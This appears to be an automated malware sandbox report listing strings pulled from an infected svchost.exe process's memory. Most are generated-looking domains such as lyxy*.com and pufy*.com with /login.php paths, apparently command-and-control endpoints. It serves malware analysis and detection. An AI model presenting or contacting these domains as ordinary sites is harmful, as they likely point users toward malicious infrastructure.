    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560998370.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1553664034.0000000006007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyvix.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597491228.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599208546.00000000060A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600322672.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyxyj.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyfar.com/login.php
    Source: svchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533832899.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxygud.com/login.php
    Source: svchost.exe, 00000002.00000003.1671559153.00000000029B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090770576.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2091016673.0000000002956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxygur.com/login.php
    Source: svchost.exe, 00000002.00000003.1459941398.000000000B44D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533832899.000000000B454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyjaj.com/login.php
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660268738.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084205455.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669951081.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyjod.com/login.php
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1531530033.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467659366.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459941398.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467589807.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534189667.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxymin.com/login.php
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxynej.com/login.php
    Source: svchost.exe, 00000002.00000003.2035294688.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034558504.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023797256.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2026757064.00000000029C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxynir.com/H
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562173607.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559111148.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1554779210.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560818719.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561263694.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1553664034.0000000006007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxysun.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxytur.com/login.php
    Source: svchost.exe, 00000002.00000003.2069850659.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2077691101.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648070332.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650606873.00000000060EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywen.com/
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywer.com/login.php
    Source: svchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599208546.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600411612.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600414604.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1608032258.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywij.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660268738.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669951081.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650532264.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648460098.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyxox.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585352038.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609355192.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1607712523.0000000006035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyxyd.com/login.php
    Source: svchost.exe, 00000002.00000003.1671559153.00000000029B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669412325.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycog.com/login.php
    Source: svchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1531530033.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799076487.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800862645.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1525159477.0000000006006000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534189667.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1527597115.0000000006008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycol.com/login.php
    Source: svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufygug.com/
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418399086.00000000060CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1464966899.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417728429.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1421183651.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufygug.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyjag.com/login.php
    Source: svchost.exe, 00000002.00000003.1580252694.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1583844692.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579912316.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1586377868.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585383980.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1577080593.00000000029FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1586144218.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyjuq.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559111148.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1554779210.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850188368.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853567914.0000000003A60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560818719.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1553664034.0000000006007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufylap.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2038097652.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637675576.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638312778.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044633046.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044910027.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2041626370.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufylul.com/login.php
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447172965.000000000600D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418952774.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufymoq.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2067567385.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyweq.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609355192.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1607712523.0000000006035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufywil.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxug.com/login.php
    Source: svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxyp.com/
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujybev.com/login.php
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2514446491.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycil.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1548763256.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycov.com/login.php
    Source: svchost.exe, 00000002.00000003.2026567354.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2024313127.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2024037953.00000000060EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycyp.com/
    Source: svchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1531530033.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1552047254.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1525159477.0000000006006000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550101575.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534189667.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1527597115.0000000006008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujydag.com/login.php
    Source: svchost.exe, 00000002.00000003.1660127247.0000000003A2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660127068.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujygug.com/login.php
